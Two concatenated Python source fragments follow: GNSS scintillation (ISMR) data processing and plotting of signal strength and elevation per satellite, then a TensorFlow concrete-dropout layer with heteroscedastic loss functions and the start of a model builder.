        Decimate 2 samples per minute: min & max values.
        """
        # Resampling each minute: min & max values
        self.df = self.df.resample("T").agg(["min", "max"])
        # Delete unused columns
        del self.df["I"]
        del self.df["Q"]
        del self.df["Signal", "min"]
        del self.df["SVID", "min"]
        # Rename columns
        index1 = self.df.columns.get_level_values(0)
        index2 = self.df.columns.get_level_values(1)
        new_columns = []
        for i in range(4):
            if i<2:
                value = index1[i]
            else:
                value = index1[i] + "_" + index2[i]
            new_columns.append(value)
        self.df.columns = new_columns
        # Create the df
        df_min = self.df.iloc[:,0:3]
        df_min.rename(columns={"Amp_min":"Amp"}, inplace=True)
        df_max = self.df.iloc[:,[0,1,3]]
        df_max.rename(columns={"Amp_max":"Amp"}, inplace=True)
        df_max.index += datetime.timedelta(seconds=30)
        self.df = pd.concat([df_min, df_max])
        self.df.sort_index(inplace=True)
        return self.df

    def get_date(self):
        """
        Get df date
        """
        fecha = self.df.index[0]
        fecha_s = datetime.datetime.strftime(fecha, "%y/%m/%d")
        return fecha_s

    def plot_fast(self, col="Amp"):
        """
        Plot a column from a df. GPS|G03
        """
        # Hard-coded to satellite G03 for a quick visual check.
        mask = self.df["PRN"]=="G03"
        df_p = self.df[mask]
        df_p[col].plot()
        plt.xlabel("Time UTC")
        plt.ylabel("Signal Intensity (dB)")
        plt.title("Signal Intensity (dB)")
        plt.title("GPS|G3", loc="right")
        plt.title(f"{self.get_date()}", loc='left')
        plt.grid(which='both')
        plt.savefig("test.png")
        return 'Ok'
class PlotsISMR():
def __init__(self, dataframe, ismr_file_name):
    # dataframe: normalized ISMR df (has a "PRN" column; DateTime index
    # per ProcessISMR.normalize_df — TODO confirm with callers).
    self.df = dataframe
    self.file_name = ismr_file_name # e.g. ljic219b15.20_.ismr
# PLOT HELPER METHODS
# ------------
# Check no null column in the frequency column
def _check_noNull_values(self, const, freq):
mask = self.df["PRN"].str.contains(const)
df_aux = self.df[mask]
if df_aux[freq].isna().sum() < len(df_aux):
return True
else:
return False
def get_station_name(self):
"""
Get the station name based on the station code.
Add other stations names if neccessary.
"""
station_code = self.file_name[:4]
if station_code == "ljic":
return "Jicamarca"
elif station_code == "lsba":
return "San-Bartolomé"
else:
return ""
def get_output_figure_name(self):
station = self.file_name[:4]
doy = self.file_name[4:7]
yy = self.file_name[-8:-6]
fecha_s = doy + "/" + yy
fecha = datetime.datetime.strptime(fecha_s, "%j/%y")
fecha_new = datetime.datetime.strftime(fecha, "%y%m%d")
new_figure_name = station + "_" + fecha_new
return new_figure_name
# Extract PRNs of a constellation and freq, in which there is no null data
def extract_prns(self, const='G', freq='CN0_sig1'): # const: char (e.g. 'G')
prns = self.df["PRN"].unique().tolist()
PRNs = [value for value in prns if const in value]
PRNs.sort(key=lambda x: int(x[1:])) # sort in ascendent order
# Check no null columns in the prns
prn_values = []
for value in PRNs:
mask = self.df["PRN"] == value
df_test = self.df[mask]
if df_test[freq].isna().sum() < len(df_test): # when the column is not null
prn_values.append(value)
return prn_values
# Extract info from any variable such as: elevation or CN0
def get_variable(self, prn='G10', var='CN0_sig1'):
""" Get the values of a given variable, for each PRN
"""
mask = self.df["PRN"]==prn
df_aux = self.df[mask]
df_final = df_aux[var]
return df_final
def all_prns(self, const='G'):
    """Nominal full PRN list per constellation: G01..G32 for GPS,
    E01..E36 for Galileo, empty otherwise."""
    fleet_size = {'G': 32, 'E': 36}.get(const, 0)
    return [f'{const}{num:02d}' for num in range(1, fleet_size + 1)]
# Convert SBAS code to SVID (number only)
def _convert2SVID(self, prn='G10'):
if prn[0] == "S":
nn = int(prn[1:])
if 20 <= nn <= 40:
return str(nn + 100)
elif 41 <= nn <= 58:
return str(nn + 157)
else:
return str(nn)
else:
return prn
# Get the frequency name and value for a given PRN code and Freq code
# Get the frequency name and value for a given PRN code and Freq code
def get_freq_name(self, const='G', freq_code=1):
    """Map (constellation letter, signal number 1..3) to the signal name
    and carrier frequency in MHz (both strings).  Unknown combinations
    yield the error string "Insert a right code!"."""
    signal_table = {
        1: {
            'G': ('L1CA', "1575.42"),
            'R': ('L1CA', "1602"),  # change
            'S': ('L1CA', "1575.42"),
            'J': ('L1CA', "1575.42"),
            'E': ('L1BC', "1575.42"),
            'C': ('B1', "1575.42"),
            'I': ('B1', "1176.45"),
        },
        2: {
            'G': ('L2C', "1227.60"),
            'R': ('L2C', "1246"),  # change
            'J': ('L2C', "1227.60"),
            'E': ('E5a', '1176.45'),
            'C': ('B2', '1176.45'),
            'S': ('L5', '1176.45'),
        },
        3: {
            'G': ('L5', '1176.45'),
            'J': ('L5', '1176.45'),
            'E': ('E5b', '1207.14'),
            'C': ('B3', '1268.52'),
        },
    }
    entry = signal_table.get(freq_code, {}).get(const)
    if entry is None:
        return "Insert a right code!"
    return {"name": entry[0], "value": entry[1]}
# Get the name for a given constelation code
# Get the name for a given constelation code
def get_const_name(self, const='G'):
    """Full constellation name for a one-letter PRN code."""
    names = {'G': 'GPS', 'R': 'GLONASS', 'E': 'GALILEO', 'S': 'SBAS',
             'C': 'BEIDOU', 'J': 'QZSS', 'I': 'IRNSS'}
    return names.get(const, 'Incorrect PRN code!')
# Convert GPS into SBAS frequencies
def _convert_GPS2SBAS_frequency(self, freq='CN0_sig1'):
if freq == 'CN0_sig1': return freq
elif freq == 'CN0_sig3': return 'CN0_sig2'
# Append SBAS prns at the end of the PRN list, only for GPS const
def _append_sbas_prns(self, freq, PRNs):
while freq != 'CN0_sig2':
freq_sbas = self._convert_GPS2SBAS_frequency(freq)
PRNs_SBAS = self.extract_prns(const='S', freq=freq_sbas)
PRNs += PRNs_SBAS
break
return PRNs
# PLOT VARIABLES: CN0, S4
# --------------
# Plot CN0 vs time, and elevation vs time (PLOT TYPE I)
def plotCN0(self, pdf, const='G', freq='CN0_sig1'):
    """
    Plot CN0 vs time and elevation vs time (PLOT TYPE I): one subplot per
    PRN, paginated onto landscape A4 figures, each page appended to *pdf*.

    Input:
        - pdf: object to save into a pdf file (e.g. a PdfPages instance)
        - const: constellation code letter ('G', 'R', 'E', ...)
        - freq: CN0 column prefix, e.g. 'CN0_sig1'
    Returns 'Ok!' unconditionally; a message is printed saying whether
    anything was plotted (skipped entirely when the data is all null).
    """
    if self._check_noNull_values(const, freq):
        # Get file UTC date from the station/date figure name
        figure_name = self.get_output_figure_name() # e.g. ljic_200926
        fecha = figure_name[5:] # e.g. 200926
        fecha2 = datetime.datetime.strptime(fecha, "%y%m%d")
        fecha3 = datetime.datetime.strftime(fecha2,"%Y/%m/%d")
        fecha2_tomorrow = fecha2 + pd.DateOffset(days=1)
        fecha2_tomorrow = fecha2_tomorrow.to_pydatetime()
        # Get UTC day range, to add a vertical strip (11h-23h UTC is drawn
        # white over the grey background; presumably local daytime — confirm)
        fecha_morning_first = fecha2 + pd.DateOffset(hours=11)
        fecha_morning_first = fecha_morning_first.to_pydatetime()
        fecha_morning_last = fecha2 + pd.DateOffset(hours=23)
        fecha_morning_last = fecha_morning_last.to_pydatetime()
        # Get the PRNs
        PRNs = self.extract_prns(const, freq)
        # Append SBAS PRNs for GPS const
        if const=='G': PRNs = self._append_sbas_prns(freq, PRNs)
        # Define the A4 page dimensions (landscape)
        fig_width_cm = 29.7
        fig_height_cm = 21
        inches_per_cm = 1 / 2.54 # Convert cm to inches
        fig_width = fig_width_cm * inches_per_cm # width in inches
        fig_height = fig_height_cm * inches_per_cm # height in inches
        fig_size = [fig_width, fig_height]
        # Create the figure with the subplots; pad to an even count so the
        # 2-column grid is always filled pairwise
        n_plots = len(PRNs) + len(PRNs)%2 # Number of subplots with data (even number)
        n_rows = 6 # Number of available rows p/ page
        n_cols = 2 # Number of available columns p/ page
        hratios = [1]*n_rows
        n_plots_left = n_plots
        q = 0
        while n_plots_left > 0:
            # Determine the number of subplots in the figure: full pages take
            # n_rows*n_cols PRNs; the final page takes whatever remains
            if (n_plots_left//(n_rows*n_cols)) > 0:
                q += 1
                n_plots2 = n_rows*n_cols
                PRNs_section = PRNs[:n_rows*n_cols]
                PRNs = PRNs[n_rows*n_cols:]
            else:
                n_plots2 = n_plots_left
                PRNs_section = PRNs
            # Plot
            fig, axs = plt.subplots(n_rows, n_cols, figsize=fig_size, sharex=False, sharey="row",
                                    gridspec_kw={'hspace': 0, 'wspace': 0, 'height_ratios':hratios})
            j = 0
            for ax in axs.reshape(-1): # Plot from left to right, rather than top to bottom
                if j < n_plots_left: # Plot
                    # ax -> CN0 (left y axis)
                    # ax2 -> elevation (right y axis)
                    ax2 = ax.twinx()
                    # Plot CN0 & elevation data (padded slots get axes styling
                    # only, no data)
                    if j < len(PRNs_section):
                        prn_value = PRNs_section[j]
                        # -> Get the correct freq for SBAS const, appended to GPS plots
                        if const=='G' and prn_value[0]=='S':
                            freq_n = self._convert_GPS2SBAS_frequency(freq)
                        else: freq_n = freq
                        color1 = "blue" # This color is used in y axis labels, ticks and border
                        colors1 = ["cornflowerblue", "navy"] # These colors are used for the plot lines
                        # Two antennas/sub-signals per frequency: columns "_1" and "_2"
                        for k in range(2):
                            df3_cn0 = self.get_variable(prn_value, var=freq_n+f"_{k+1}")
                            ax.plot(df3_cn0.index, df3_cn0.values, '.', color=colors1[k], markersize=2)
                        # Plot the strip day/night
                        ax.set_facecolor(color="lightgrey")
                        ax.axvspan(fecha_morning_first, fecha_morning_last, color="white") # strip morning/night
                        # Plot elevation info
                        df2_elev = self.get_variable(prn_value, var="Elev")
                        color2 = "orange"
                        ax2.plot(df2_elev.index, df2_elev.values, '.', color=color2, markersize=1)
                        # Annotate the prn in the subplot
                        x_location = fecha2 + pd.Timedelta(minutes=30)
                        ax2.text(x_location, 35, self._convert2SVID(prn_value), fontsize=15, weight='roman') # 0.375
                    # Set axis limits
                    ax.set_xlim([fecha2, fecha2_tomorrow])
                    ax.set_ylim([0,80]) # CN0 (dB-Hz)
                    ax2.set_ylim([0,90]) # Elevation angle (º)
                    # Set ticks and tick labels
                    # -> Set y axis format, labels odds subplots only
                    len_half_ax = len(axs.T.reshape(-1))/2
                    if j%2 == 1: # change only for the 2nd column
                        # Set y labels only to even subplots
                        ax.yaxis.set_minor_locator(AutoMinorLocator(4))
                        ax.set_yticks([0,80])
                        ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
                        ax2.set_yticks([0,90])
                        if j%4 == 1: # subsequent subplot
                            ax.set_yticklabels([0,80])
                            ax2.set_yticklabels([0,90])
                        else:
                            ax.set_yticklabels(['',''])
                            ax2.set_yticklabels(['',''])
                        # Set the elevation color to the right y axis
                        # NOTE(review): color2 is only (re)assigned inside the
                        # data branch above; padded slots reuse the value from
                        # the previous loop iteration.
                        for axis in ['top','bottom','left']:
                            ax.spines[axis].set_linewidth(2)
                            ax2.spines[axis].set_linewidth(2)
                        ax.spines['right'].set_color(color2)
                        ax.spines['right'].set_linewidth(2)
                        ax2.spines['right'].set_color(color2)
                        ax2.spines['right'].set_linewidth(2)
                        ax2.tick_params(axis='y', which='both', colors=color2)
                    else: # apply some changes to the 1st column
                        # remove y tick labels for elevation
                        ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
                        ax2.set_yticks([0,90])
                        ax2.set_yticklabels(['',''])
                        # set linewidth to top, bottom and right borders of the subplot
                        for axis in ['top','bottom','right']:
                            ax.spines[axis].set_linewidth(2)
                            ax2.spines[axis].set_linewidth(2)
                        # Set blue color to the left y axis
                        ax.spines['left'].set_color(color1)
                        ax.spines['left'].set_linewidth(2)
                        ax2.spines['left'].set_color(color1)
                        ax2.spines['left'].set_linewidth(2)
                        ax.tick_params(axis='y', which='both', colors=color1)
                    # -> Set x axis format
                    hours = mdates.HourLocator(interval = 2)
                    ax.xaxis.set_major_locator(hours) # ticks interval: 2h
                    #ax.xaxis.set_major_locator(NullLocator()) # ticks interval: 2h
                    ax.xaxis.set_minor_locator(AutoMinorLocator(2)) # minor tick division: 2
                    myFmt = DateFormatter("%H")
                    ax.xaxis.set_major_formatter(myFmt) # x format: hours
                    # -> set the ticks style
                    ax.xaxis.set_tick_params(width=2, length=8, which='major', direction='out')
                    ax.xaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
                    ax.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
                    ax.yaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
                    ax2.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
                    ax2.yaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
                    # -> set the label ticks
                    ax.tick_params(axis='x', which='major', labelsize=12)
                    ax.tick_params(axis='y', labelsize=12)
                    ax2.tick_params(axis='y', labelsize=12)
                    if j == (n_plots2-1): # lower right: keep x tick labels
                        pass
                    elif j == (n_plots2-2): # lower left: keep x tick labels
                        pass
                    else: # hide label xticks
                        ax.tick_params(axis='x', which='major', labelsize=12, labelbottom='off')
                    # Set grid
                    ax.grid(which='major', axis='both', ls=':', linewidth=1.2)
                    ax.grid(which='minor', axis='both', ls=':', alpha=0.5)
                    # Set title and axis labels
                    aux = self.get_freq_name(const, int(freq[-1]))
                    frequency_name = aux["name"]
                    frequency_value = aux["value"] + "MHz"
                    # -> Title (drawn in figure coordinates relative to the
                    #    first-row axes)
                    if j == 0: # Subplot on Upper left
                        fig.text(0, 1, fecha3, ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                        fig.text(0.42, 1, self.get_station_name(), ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                    if j == 1: # Subplot on Upper right
                        fig.text(0, 1.3, 'Amplitude', ha='center', va='bottom', fontsize=19, weight='semibold', transform=ax.transAxes)
                        fig.text(0.3, 1, frequency_value, ha='center', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                        fig.text(1, 1, f"{frequency_name} | {self.get_const_name(const)}", ha='right', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                    # -> Labels
                    if j == n_plots2-1: # x axis label, Subplot on Lower right
                        fig.text(0, -0.5, 'Time UTC', ha='center', va='center', fontsize=14, transform=ax.transAxes)
                    aux_nrows = int(n_plots2/n_cols)
                    if j == aux_nrows-aux_nrows%2: # y axis label on the left
                        k = (aux_nrows%2)*0.5
                        fig.text(-0.1, 1-k, 'C/N0(dB-Hz)', ha='center', va='center', rotation='vertical', fontsize=14, color='b', transform=ax.transAxes)
                    if j == (aux_nrows+(1-aux_nrows%2)): # y axis label on the right
                        k = (aux_nrows%2)*0.5
                        fig.text(1.1, 1-k, 'Elevation Angle($^o$)', ha='center', va='center', rotation=-90, fontsize=14, color=color2, transform=ax.transAxes)
                else:
                    # Slot beyond the data for this page: blank it out
                    ax.axis('off')
                j += 1
            # Save figure as pdf (appends one page to the PdfPages object)
            pdf.savefig()
            n_plots_left -= j
        print(f"Plotted successfully; for const: {const}, and freq: {freq}!")
    else:
        print(f"There is only Null data; for const: {const}, and freq: {freq}!")
    return 'Ok!'
# Plot CN0 vs time, and elevation vs time (PLOT TYPE II)
# Nº subplots/page = 36; Marker = dash ('-'); line's color = blue;
# Top = s4 graphs; PRN names = right side
def plotCN0_2(self, pdf, const='G', freq='CN0_sig1'):
    """
    Plot CN0 vs time and elevation vs time (PLOT TYPE II).

    Differences vs plotCN0 (type I): 18 rows per page (36 subplots),
    dashed/line markers instead of dots, all CN0 lines navy, data resampled
    to 1-minute frequency, axes swapped (ax carries elevation, ax2 carries
    CN0), and the full PRN list for the constellation is used.

    Input:
        - pdf: object to save into a pdf file (e.g. a PdfPages instance)
        - const: constellation code letter
        - freq: CN0 column prefix, e.g. 'CN0_sig1'
    Returns 'Ok!' unconditionally.
    """
    if self._check_noNull_values(const, freq):
        # Get file UTC date
        figure_name = self.get_output_figure_name() # e.g. ljic_200926
        fecha = figure_name[5:] # e.g. 200926
        fecha2 = datetime.datetime.strptime(fecha, "%y%m%d")
        fecha3 = datetime.datetime.strftime(fecha2,"%Y/%m/%d")
        fecha2_tomorrow = fecha2 + pd.DateOffset(days=1)
        fecha2_tomorrow = fecha2_tomorrow.to_pydatetime()
        # Get UTC day range, to add a vertical strip
        fecha_morning_first = fecha2 + pd.DateOffset(hours=11)
        fecha_morning_first = fecha_morning_first.to_pydatetime()
        fecha_morning_last = fecha2 + pd.DateOffset(hours=23)
        fecha_morning_last = fecha_morning_last.to_pydatetime()
        # Get the PRNs: the whole constellation, not just those with data
        #PRNs = self.extract_prns(const, freq)
        PRNs = self.all_prns(const)
        # Append SBAS PRNs for GPS const
        if const=='G': PRNs = self._append_sbas_prns(freq, PRNs)
        # Define the A4 page dimensions (landscape)
        fig_width_cm = 29.7
        fig_height_cm = 21
        inches_per_cm = 1 / 2.54 # Convert cm to inches
        fig_width = fig_width_cm * inches_per_cm # width in inches
        fig_height = fig_height_cm * inches_per_cm # height in inches
        fig_size = [fig_width, fig_height]
        # Create the figure with the subplots
        n_plots = len(PRNs) + len(PRNs)%2 # Number of subplots with data (even number)
        n_rows = 18 # Number of available rows p/ page
        n_cols = 2 # Number of available columns p/ page
        hratios = [1]*n_rows
        n_plots_left = n_plots
        q = 0
        while n_plots_left > 0:
            # Determine the number of subplots in the figure
            if (n_plots_left//(n_rows*n_cols)) > 0:
                q += 1
                n_plots2 = n_rows*n_cols
                PRNs_section = PRNs[:n_rows*n_cols]
                PRNs = PRNs[n_rows*n_cols:]
            else:
                n_plots2 = n_plots_left
                PRNs_section = PRNs
            # Plot
            fig, axs = plt.subplots(n_rows, n_cols, figsize=fig_size, sharex=False, sharey=False,
                                    gridspec_kw={'hspace': 0, 'wspace': 0, 'height_ratios':hratios})
            j = 0
            for ax in axs.reshape(-1): # Plot from left to right, rather than top to bottom
                if j < n_plots_left: # Plot
                    # ax -> elevation (ticks moved to the right)
                    # ax2 -> CN0 (ticks moved to the left)
                    ax2 = ax.twinx()
                    # Change y axis positions
                    ax.yaxis.set_label_position("right")
                    ax.yaxis.tick_right()
                    ax2.yaxis.set_label_position("left")
                    ax2.yaxis.tick_left()
                    # Plot CN0 & elevation data
                    if j < len(PRNs_section):
                        prn_value = PRNs_section[j]
                        # -> Get the correct freq for SBAS const, appended to GPS plots
                        if const=='G' and prn_value[0]=='S':
                            freq_n = self._convert_GPS2SBAS_frequency(freq)
                        else: freq_n = freq
                        color1 = "blue" # This color is used in y axis labels, ticks and border
                        colors1 = ["navy"]*2 #["cornflowerblue", "navy"] # These colors are used for the plot lines
                        for k in range(2):
                            df3_cn0 = self.get_variable(prn_value, var=freq_n+f"_{k+1}")
                            df3_cn0 = df3_cn0.sort_index().asfreq("T") # resampling each minute
                            ax2.plot(df3_cn0.index, df3_cn0.values, '-', color=colors1[k], markersize=2)
                        # Plot the strip day/night
                        ax.set_facecolor(color="lightgrey")
                        ax.axvspan(fecha_morning_first, fecha_morning_last, color="white") # strip morning/night
                        # Plot elevation info
                        df2_elev = self.get_variable(prn_value, var="Elev")
                        df2_elev = df2_elev.sort_index().asfreq("T") # Resampling each minute
                        color2 = "orange"
                        ax.plot(df2_elev.index, df2_elev.values, '-', color=color2, markersize=1)
                        # Annotate the prn in the subplot (late in the day, mid-height)
                        x_location = fecha2 + pd.Timedelta(hours=21, minutes=30)
                        ax.text(x_location, 51, self._convert2SVID(prn_value), fontsize=12, weight='roman') # 0.375
                    # Set axis limits
                    ax.set_xlim([fecha2, fecha2_tomorrow])
                    ax.set_ylim([0,90]) # Elevation angle (º)
                    ax2.set_ylim([0,80]) # CN0 (dB-Hz)
                    ax.yaxis.set_minor_locator(AutoMinorLocator(4))
                    ax.set_yticks([0,90])
                    ax2.yaxis.set_minor_locator(AutoMinorLocator(4))
                    ax2.set_yticks([0,80])
                    # NOTE(review): color1/color2 are only (re)assigned in the
                    # data branch; padded slots reuse the previous iteration's.
                    if j%2 == 0: # first column
                        ax.set_yticklabels(['',''])
                        if j%4 == 0:
                            ax2.set_yticklabels([0,80])
                        else:
                            ax2.set_yticklabels(['',''])
                        # set linewidth to all borders of the subplot
                        for axis in ['top','bottom','right','left']:
                            ax.spines[axis].set_linewidth(2)
                            ax2.spines[axis].set_linewidth(2)
                        # set color for left spine (CN0 side)
                        ax2.spines['left'].set_color(color1)
                        ax2.tick_params(axis='y', which='both', colors=color1) # tick and tick label color
                    else: # second column
                        ax2.set_yticklabels(['',''])
                        if j%4 == 1:
                            ax.set_yticklabels([0,90])
                        else:
                            ax.set_yticklabels(['',''])
                        # set linewidth to all borders of the subplot
                        for axis in ['top','bottom','right','left']:
                            ax.spines[axis].set_linewidth(2)
                            ax2.spines[axis].set_linewidth(2)
                        # set color for right spine (elevation side)
                        ax2.spines['right'].set_color(color2)
                        ax.tick_params(axis='y', which='both', colors=color2) # tick and tick label color
                    # -> Set x axis format
                    hours = mdates.HourLocator(interval = 2)
                    ax.xaxis.set_major_locator(hours) # ticks interval: 2h
                    #ax.xaxis.set_major_locator(NullLocator()) # ticks interval: 2h
                    ax.xaxis.set_minor_locator(AutoMinorLocator(2)) # minor tick division: 2
                    myFmt = DateFormatter("%H")
                    ax.xaxis.set_major_formatter(myFmt) # x format: hours
                    # -> set the ticks style
                    ax.xaxis.set_tick_params(width=2, length=8, which='major', direction='out')
                    ax.xaxis.set_tick_params(width=1, length=4, which='minor', direction='out')
                    ax.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
                    ax.yaxis.set_tick_params(width=1, length=8, which='minor', direction='inout')
                    ax2.yaxis.set_tick_params(width=2, length=15, which='major', direction='inout')
                    ax2.yaxis.set_tick_params(width=1, length=8, which='minor', direction='inout')
                    # -> set the label ticks
                    ax.tick_params(axis='x', which='major', labelsize=12)
                    ax.tick_params(axis='y', labelsize=12)
                    ax2.tick_params(axis='y', labelsize=12)
                    if j == (n_plots2-1): # lower right: keep x tick labels
                        pass
                    elif j == (n_plots2-2): # lower left: keep x tick labels
                        pass
                    else: # hide label xticks
                        ax.tick_params(axis='x', which='major', labelsize=12, labelbottom='off')
                    # Set grid
                    ax.grid(which='major', axis='both', ls=':', linewidth=1.2)
                    ax.grid(which='minor', axis='both', ls=':', alpha=0.5)
                    # Set title and axis labels
                    aux = self.get_freq_name(const, int(freq[-1]))
                    frequency_name = aux["name"]
                    frequency_value = aux["value"] + "MHz"
                    # -> Title
                    if j == 0: # Subplot on Upper left
                        fig.text(0, 1, fecha3, ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                        fig.text(0.42, 1, self.get_station_name(), ha='left', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                    if j == 1: # Subplot on Upper right
                        fig.text(0, 1.7, 'Amplitude', ha='center', va='bottom', fontsize=19, weight='semibold', transform=ax.transAxes)
                        fig.text(0.3, 1, frequency_value, ha='center', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                        fig.text(1, 1, f"{frequency_name} | {self.get_const_name(const)}", ha='right', va='bottom', fontsize=17, weight='semibold', transform=ax.transAxes)
                    # -> Labels
                    if j == n_plots2-1: # x axis label, Subplot on Lower right
                        fig.text(0, -1.35, 'Time UTC', ha='center', va='center', fontsize=14, transform=ax.transAxes)
                    aux_nrows = int(n_plots2/n_cols)
                    if j == aux_nrows-aux_nrows%2: # y axis label on the left
                        k = (aux_nrows%2)*0.5
                        fig.text(-0.11, 1-k, 'C/N0(dB-Hz)', ha='center', va='center', rotation='vertical', fontsize=14, color='b', transform=ax.transAxes)
                    if j == (aux_nrows+(1-aux_nrows%2)): # y axis label on the right
                        k = (aux_nrows%2)*0.5
                        fig.text(1.11, 1-k, 'Elevation Angle($^o$)', ha='center', va='center', rotation=-90, fontsize=14, color=color2, transform=ax.transAxes)
                else:
                    # Slot beyond the data for this page: blank it out
                    ax.axis('off')
                j += 1
            # Save figure as pdf
            pdf.savefig()
            n_plots_left -= j
        print(f"Plotted successfully; for const: {const}, and freq: {freq}!")
    else:
        print(f"There is only Null data; for const: {const}, and freq: {freq}!")
    return 'Ok!'
|
import tensorflow as tf
from tensorflow.keras import optimizers
from tensorflow.keras.layers import InputSpec, Dense, Wrapper, Input, concatenate
from tensorflow.keras.models import Model
import numpy as np
class ConcreteDropout(Wrapper):
    """This wrapper allows to learn the dropout probability for any given input Dense layer.
    ```python
    # as the first layer in a model
    model = Sequential()
    model.add(ConcreteDropout(Dense(8), input_shape=(16)))
    # now model.output_shape == (None, 8)
    # subsequent layers: no need for input_shape
    model.add(ConcreteDropout(Dense(32)))
    # now model.output_shape == (None, 32)
    ```
    `ConcreteDropout` can be used with arbitrary layers which have 2D
    kernels, not just `Dense`. However, Conv2D layers require different
    weighing of the regulariser (use SpatialConcreteDropout instead).

    Note: unlike a plain Keras layer, `call` returns a *tuple*
    `(layer_output, regularizer_scalar)`; the caller is expected to collect
    the regularizer via `model.add_loss`.

    # Arguments
        layer: a layer instance.
        weight_regularizer:
            A positive number which satisfies
                $weight_regularizer = l**2 / (\tau * N)$
            with prior lengthscale l, model precision $\tau$ (inverse observation noise),
            and N the number of instances in the dataset.
            Note that kernel_regularizer is not needed.
        dropout_regularizer:
            A positive number which satisfies
                $dropout_regularizer = 2 / (\tau * N)$
            with model precision $\tau$ (inverse observation noise) and N the number of
            instances in the dataset.
            Note the relation between dropout_regularizer and weight_regularizer:
                $weight_regularizer / dropout_regularizer = l**2 / 2$
            with prior lengthscale l. Note also that the factor of two should be
            ignored for cross-entropy loss, and used only for the euclidean loss.
    """
    def __init__(self, layer, weight_regularizer=0, dropout_regularizer=1e-5,
                 init_min=0.1, init_max=0.1, is_mc_dropout=True, **kwargs):
        # Regularisation is computed here, so the wrapped layer must not
        # carry its own kernel_regularizer.
        assert 'kernel_regularizer' not in kwargs
        super(ConcreteDropout, self).__init__(layer, **kwargs)
        self.weight_regularizer = weight_regularizer
        self.dropout_regularizer = dropout_regularizer
        self.is_mc_dropout = is_mc_dropout
        self.supports_masking = True
        self.p_logit = None
        # Dropout probability is stored in logit space so it is
        # unconstrained during optimisation: logit(p) = log(p) - log(1-p).
        self.init_min = np.log(init_min) - np.log(1. - init_min)
        self.init_max = np.log(init_max) - np.log(1. - init_max)
    def build(self, input_shape=None):
        """Build the wrapped layer, then add the trainable dropout logit."""
        self.input_spec = InputSpec(shape=input_shape)
        if not self.layer.built:
            self.layer.build(input_shape)
            self.layer.built = True
        super(ConcreteDropout, self).build()
        # initialise p (one scalar logit, drawn uniformly in [init_min, init_max])
        self.p_logit = self.add_weight(name='p_logit',
                                       shape=(1,),
                                       initializer=tf.random_uniform_initializer(self.init_min, self.init_max),
                                       dtype=tf.dtypes.float32,
                                       trainable=True)
    def compute_output_shape(self, input_shape):
        # Output shape is entirely determined by the wrapped layer.
        return self.layer.compute_output_shape(input_shape)
    def concrete_dropout(self, x, p):
        """
        Concrete dropout - used at training time (gradients can be propagated)
        :param x: input
        :param p: dropout probability (tensor), differentiable
        :return: approx. dropped out input, rescaled by 1/(1-p)
        """
        eps = 1e-07
        temp = 0.1
        # Relaxed (sigmoid of logistic noise) Bernoulli drop mask.
        unif_noise = tf.random.uniform(shape=tf.shape(x))
        drop_prob = (
            tf.math.log(p + eps)
            - tf.math.log(1. - p + eps)
            + tf.math.log(unif_noise + eps)
            - tf.math.log(1. - unif_noise + eps)
        )
        drop_prob = tf.math.sigmoid(drop_prob / temp)
        random_tensor = 1. - drop_prob
        retain_prob = 1. - p
        # Inverted-dropout scaling keeps the expected activation unchanged.
        x *= random_tensor
        x /= retain_prob
        return x
    def call(self, inputs, training=None):
        """Apply concrete dropout + the wrapped layer.

        Returns (output, regularizer): the KL-style regularizer combines a
        weight term scaled by 1/(1-p) and the dropout-entropy term.
        """
        p = tf.math.sigmoid(self.p_logit)
        # initialise regulariser / prior KL term
        input_dim = inputs.shape[-1] # last dim
        weight = self.layer.kernel
        kernel_regularizer = self.weight_regularizer * tf.reduce_sum(tf.square(weight)) / (1. - p)
        dropout_regularizer = p * tf.math.log(p) + (1. - p) * tf.math.log(1. - p)
        dropout_regularizer *= self.dropout_regularizer * input_dim
        regularizer = tf.reduce_sum(kernel_regularizer + dropout_regularizer)
        if self.is_mc_dropout:
            # MC dropout: always sample, at train and test time alike.
            return self.layer.call(self.concrete_dropout(inputs, p)), regularizer
        else:
            def relaxed_dropped_inputs():
                return self.layer.call(self.concrete_dropout(inputs, p)), regularizer
            # Standard dropout: sample only in the training phase.
            return tf.keras.backend.in_train_phase(relaxed_dropped_inputs,
                                                   self.layer.call(inputs),
                                                   training=training), regularizer
def mse_loss(true, pred):
    """Mean squared error against the mean half of a (mean, log_var) prediction.

    `pred` concatenates [mean, log_var] along axis 1; only the mean half is
    compared to `true`.
    """
    half = pred.shape[1] // 2
    predicted_mean = pred[:, :half]
    squared_error = (true - predicted_mean) ** 2
    return tf.reduce_mean(squared_error, -1)
def heteroscedastic_loss(true, pred):
    """Gaussian negative-log-likelihood-style loss with learned variance.

    `pred` concatenates [mean, log_var] along axis 1.  Each squared error is
    weighted by the predicted precision exp(-log_var), and log_var itself is
    penalised so the model cannot inflate variance for free.
    """
    half = pred.shape[1] // 2
    predicted_mean = pred[:, :half]
    predicted_log_var = pred[:, half:]
    precision = tf.math.exp(-predicted_log_var)
    weighted_sq_err = precision * (true - predicted_mean) ** 2.
    return tf.reduce_sum(weighted_sq_err + predicted_log_var, -1)
def make_model(n_features, n_outputs, n_nodes=100, dropout_reg=1e-5, wd=0):
    """Build and compile a heteroscedastic MLP with ConcreteDropout layers.

    Architecture: three hidden ReLU layers of `n_nodes` units, then two
    heads (predictive mean and log-variance), all wrapped in ConcreteDropout.
    The output concatenates [mean, log_var]; each wrapper's regularizer is
    registered via `model.add_loss`.
    """
    regularizer_losses = []
    inp = Input(shape=(n_features,))
    x = inp
    # Three identical hidden layers.
    for _ in range(3):
        x, reg = ConcreteDropout(Dense(n_nodes, activation='relu'),
                                 weight_regularizer=wd, dropout_regularizer=dropout_reg)(x)
        regularizer_losses.append(reg)
